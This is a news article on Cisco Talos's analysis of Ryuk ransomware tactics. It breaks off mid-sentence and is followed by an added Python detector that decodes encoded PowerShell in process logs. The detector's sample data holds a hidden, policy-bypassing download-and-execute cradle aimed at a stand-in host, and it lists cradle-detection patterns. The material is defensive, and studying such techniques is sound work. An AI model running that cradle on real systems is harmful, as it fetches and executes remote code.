Ryuk Continues to Dominate Ransomware Response Cases

Analysis reveals how Ryuk's operators are changing their techniques and using new means to break in.

Ryuk has dominated the ransomware threat landscape for the fourth consecutive quarter, Cisco Talos researchers report in an analysis of incident response trends. Its operators are changing strategy, posing greater risk to organizations whose response efforts are impeded by COVID-19. 


Ransomware continued to make up the majority of threats observed by the Cisco Talos Incident Response (CTIR) team, which today published its analysis of summer incident response trends. Ryuk has been a top ransomware threat to customers over the last year, says Sean Mason, general manager of CTIR, though the team also sees other families, including Phobos and Maze.


Over the past few quarters, Ryuk has evolved in ways that indicate its operators are shifting their tactics, Mason explains, pointing to an example: "We do see an emerging trend in Ryuk, where it is not necessarily preceded by a commodity Trojan infection, which may allow it to go undetected for some time and lead to the increased infections we are seeing," he says.


CTIR is seeing fewer incidents in which Emotet and TrickBot serve as the initial dropper for Ryuk ransomware, which is one reason there are fewer attacks using commodity Trojans overall. Ryuk's operators have instead shifted to living-off-the-land tools, which help them evade security tooling, stay quiet, and give them a longer window in which to achieve their goals.


"By limiting the noise and doing their best to blend in, they may be able to avoid detection and buy more time in which to traverse the network and accomplish their objectives," Mason notes. 


The ransomware has evolved in other ways as well. Ryuk used encoded PowerShell commands to download the ini ..
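The two techniques above, living off the land with built-in tooling and launching PowerShell through an encoded command line, are exactly what a responder has to pull apart during triage. The following is an added example, not code from the article or from Cisco Talos: a small Python script that finds encoded PowerShell launches in process-creation logs, decodes the UTF-16LE/base64 payload, and flags download-cradle fragments and stealth switches. The log format, hostnames, user names, timestamps and the 203.0.113.10 URL are all constructed for illustration and approximate a Sysmon Event ID 1 or Windows 4688 export; the indicator lists are a starting set, not a complete signature.

```python
"""Flag encoded PowerShell launches in process-creation logs and decode them.

Added example: not code from the article or from Cisco Talos. The log
format below is a constructed approximation of a Sysmon Event ID 1 /
Windows 4688 export; hosts, users and the URL are invented.
"""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match "-e<letters>" followed by a base64 run and confirm in
# code that the flag is a prefix of the full name. That rejects -ExecutionPolicy,
# which also starts with -e.
_FLAG_RE = re.compile(r"(?i)(?<![\w-])-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")

# Fragments that typically indicate a download cradle inside the decoded script.
CRADLE_PATTERNS = {
    "webclient": re.compile(r"(?i)Net\.WebClient"),
    "downloadstring": re.compile(r"(?i)Download(?:String|File|Data)"),
    "invoke-webrequest": re.compile(r"(?i)Invoke-WebRequest|\biwr\b"),
    "invoke-expression": re.compile(r"(?i)Invoke-Expression|\biex\b"),
    "bitstransfer": re.compile(r"(?i)Start-BitsTransfer"),
}

# Switches on the outer command line that are chosen to keep the launch quiet.
STEALTH_PATTERNS = {
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "noprofile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "noninteractive": re.compile(r"(?i)-noni(?:nteractive)?\b"),
    "bypass-policy": re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
}


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then base64).
    Used here only to build the constructed sample log lines."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(b64: str):
    """Return the decoded script, or None if it is not valid base64 + UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_line(line: str):
    """Return a finding dict for a line that launches encoded PowerShell, else None."""
    lowered = line.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return None
    for m in _FLAG_RE.finditer(line):
        if "encodedcommand".startswith(m.group(1).lower()):
            b64 = m.group(2)
            break
    else:
        return None
    decoded = decode_command(b64)
    indicators = [name for name, rx in STEALTH_PATTERNS.items() if rx.search(line)]
    if decoded is None:
        # Valid base64 that is not UTF-16LE text is itself worth a look: the
        # payload is either corrupted or not a plain PowerShell script.
        indicators.append("undecodable-payload")
    else:
        indicators += [name for name, rx in CRADLE_PATTERNS.items() if rx.search(decoded)]
    high = any(n in CRADLE_PATTERNS or n == "undecodable-payload" for n in indicators)
    return {"line": line, "decoded": decoded, "indicators": indicators,
            "severity": "high" if high else "medium"}


def scan_logs(lines):
    """Run analyze_line over a log export and keep only the hits."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


# Constructed sample export (not real telemetry). Line 1 is a classic cradle,
# line 3 is a benign encoded admin command, line 5 carries a payload that is
# valid base64 but not UTF-16LE (15 bytes), which the decoder must not crash on.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/x.ps1')"
SAMPLE_LOGS = [
    "2020-08-14T09:12:03Z WS-0417 CORP\\jdoe powershell.exe -nop -w hidden -ep bypass -enc "
    + encode_command(_CRADLE),
    "2020-08-14T09:13:44Z WS-0417 CORP\\jdoe powershell.exe -ExecutionPolicy Bypass "
    "-File C:\\Scripts\\inventory.ps1",
    "2020-08-14T09:15:10Z SRV-FS01 NT AUTHORITY\\SYSTEM powershell.exe -e "
    + encode_command("Get-Service | Where-Object Status -eq 'Stopped'"),
    "2020-08-14T09:16:02Z WS-0418 CORP\\asmith cmd.exe /c whoami",
    "2020-08-14T09:17:55Z WS-0419 CORP\\bkim powershell.exe -EncodedCommand Q29ycnVwdGVkUGF5bG9h",
]

if __name__ == "__main__":
    for finding in scan_logs(SAMPLE_LOGS):
        print(finding["severity"].upper(), finding["indicators"])
        print("  decoded:", finding["decoded"])
```

The decode step is the part that matters for triage: the first and third sample lines look identical at the command-line level (both are encoded launches), but only after decoding does one resolve to a download cradle and the other to a routine service query. Run over a real export, the medium-severity hits are where an analyst spends time confirming whether an encoded launch belongs to a known admin script.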
